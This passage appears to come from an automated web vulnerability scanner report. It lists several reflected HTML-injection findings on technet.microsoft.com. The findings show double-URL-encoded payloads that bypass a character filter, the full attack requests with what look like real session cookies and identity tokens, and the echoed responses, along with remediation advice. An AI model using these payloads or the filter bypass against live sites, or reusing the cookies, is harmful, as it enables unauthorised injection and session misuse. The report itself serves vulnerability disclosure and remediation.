<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us9fc60"><a>2c269684de0/library/bb727048" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48e96%2522%253e%253ca%253ebfb66181b8f was submitted in the REST URL parameter 2. This input was echoed as 48e96"><a>bfb66181b8f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library48e96%2522%253e%253ca%253ebfb66181b8f/bb727048.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:25:05 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library48e96"><a>bfb66181b8f/bb727048" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48957%2522%253e%253ca%253ebdd8a0c7ee7 was submitted in the REST URL parameter 1. This input was echoed as 48957"><a>bdd8a0c7ee7 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us48957%2522%253e%253ca%253ebdd8a0c7ee7/library/bb727050.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:24:56 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us48957"><a>bdd8a0c7ee7/library/bb727050" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dccbb%2522%253e%253ca%253eb15911436e was submitted in the REST URL parameter 1. This input was echoed as dccbb"><a>b15911436e in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usdccbb%2522%253e%253ca%253eb15911436e/library/bb727052.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10198 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:25:40 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdccbb"><a>b15911436e/library/bb727052" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fd40%2522%253e%253ca%253ea971c2a6b32 was submitted in the REST URL parameter 1. This input was echoed as 6fd40"><a>a971c2a6b32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us6fd40%2522%253e%253ca%253ea971c2a6b32/library/bb727054.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:25:51 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6fd40"><a>a971c2a6b32/library/bb727054" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3562%2522%253e%253ca%253eb70e9e2150d was submitted in the REST URL parameter 1. This input was echoed as c3562"><a>b70e9e2150d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-usc3562%2522%253e%253ca%253eb70e9e2150d/library/bb727063.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:18:15 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc3562"><a>b70e9e2150d/library/bb727063" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60505%2522%253e%253ca%253e8c06516092b was submitted in the REST URL parameter 2. This input was echoed as 60505"><a>8c06516092b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library60505%2522%253e%253ca%253e8c06516092b/bb727063.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 